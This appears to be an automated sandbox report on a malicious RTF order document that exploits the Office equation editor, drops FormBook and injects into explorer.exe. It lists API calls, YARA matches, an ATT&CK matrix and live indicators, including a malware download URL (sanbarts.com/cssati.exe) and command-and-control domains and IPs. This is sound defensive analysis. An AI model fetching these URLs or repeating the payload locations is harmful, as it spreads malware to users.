          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_009B4CB1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_009BE4A4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,5_2_009BE448
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_009B9D92
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,5_2_009A2703
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_009A2B81
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,5_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_009BE521
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,5_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,5_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_2_009BE799
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_009B8FA3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,5_2_009B9FDB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_009BA75F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,5_2_009B9F55
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_009A3663
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_009BE8C3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_009BE970
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,6_2_009BE1D4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,6_2_009A1118
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_009BE970
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_009B8969
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_009A419C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_009BEA44
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_009B4CB1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_009BE4A4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,6_2_009BE448
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_009B9D92
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,6_2_009A2703
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_009A2B81
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,6_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_009BE521
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,6_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,6_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,6_2_009BE799
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_009B8FA3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,6_2_009B9FDB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_009BA75F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,6_2_009B9F55
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B00A3 cpuid 5_2_009B00A3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_009B161F

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		Path Interception612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading          		LSASS Memory251
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth14
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts23
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer123
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync125
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 635413 Sample: Revised RFQ-PO180911.doc Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 63 Initial sample is an obfuscated RTF file 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 11 other signatures 2->69 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 23 2->16         started        process3 dnsIp4 45 sanbarts.com 194.9.94.86, 49173, 80 LOOPIASE Sweden 11->45 47 215ffbc1941f6023.7host.cn 45.120.185.113, 49174, 80 HENGDA-HKHENGDANETWORKLIMITEDHK Hong Kong 11->47 49 www.sanbarts.com 11->49 39 C:\Users\user\AppData\Roaming\word.exe, PE32 11->39 dropped 41 C:\Users\user\AppData\Local\...\cssati[1].exe, PE32 11->41 dropped 89 Office equation editor establishes network connection 11->89 91 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->91 18 word.exe 19 11->18         started        43 ~WRF{E6E86BED-0A8E...F-02AF74FFE8F6}.tmp, Composite 16->43 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\Local\...\dvukljmnr.exe, PE32 18->37 dropped 71 Multi AV Scanner detection for dropped file 18->71 22 dvukljmnr.exe 18->22         started        signatures9 process10 signatures11 73 Multi AV Scanner detection for dropped file 22->73 75 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->75 77 Tries to detect virtualization through RDTSC time measurements 22->77 79 Injects a PE file into a foreign processes 22->79 25 dvukljmnr.exe 22->25         started        process12 signatures13 81 Modifies the context of a thread in another process (thread injection) 25->81 83 Maps a DLL or memory area into another process 25->83 85 Sample uses process hollowing technique 25->85 87 Queues an APC in another process (thread injection) 25->87 28 explorer.exe 25->28 injected process14 dnsIp15 51 sbsfe-p8.geo.mf0.yahoodns.net 98.137.244.37, 49175, 80 YAHOO-GQ1US United States 28->51 53 www.storyofsol.com 28->53 55 2 other IPs or domains 28->55 93 System process connects to network (likely due to code injection or exploit) 28->93 32 wuapp.exe 28->32         started        signatures16 process17 signatures18 57 Modifies the context of a thread in another process (thread injection) 32->57 59 Maps a DLL or memory area into another process 32->59 61 Tries to detect virtualization through RDTSC time measurements 32->61 35 cmd.exe 32->35         started        process19

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Revised RFQ-PO180911.doc32%VirustotalBrowse
          Revised RFQ-PO180911.doc32%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp100%AviraEXP/CVE-2018-0798.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe9%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe62%ReversingLabsWin32.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\dvukljmnr.exe69%ReversingLabsWin32.Trojan.GenericML
          C:\Users\user\AppData\Roaming\word.exe9%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\word.exe62%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.0.dvukljmnr.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.dvukljmnr.exe.160000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.dvukljmnr.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.dvukljmnr.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.dvukljmnr.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.sanbarts.com/YR$0%Avira URL Cloudsafe
          http://sanbarts.com/cssati.exe100%Avira URL Cloudmalware
          www.rthearts.com/nk6l/0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.sanbarts.com/cssati.exeC:0%Avira URL Cloudsafe
          http://sanbarts.com/330%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://www.sanbarts.com/Couri0%Avira URL Cloudsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.sanbarts.com/cssati.exekkC:0%Avira URL Cloudsafe
          http://www.sanbarts.com/cssati.exe100%Avira URL Cloudmalware
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://sanbarts.com/cssati.exej0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
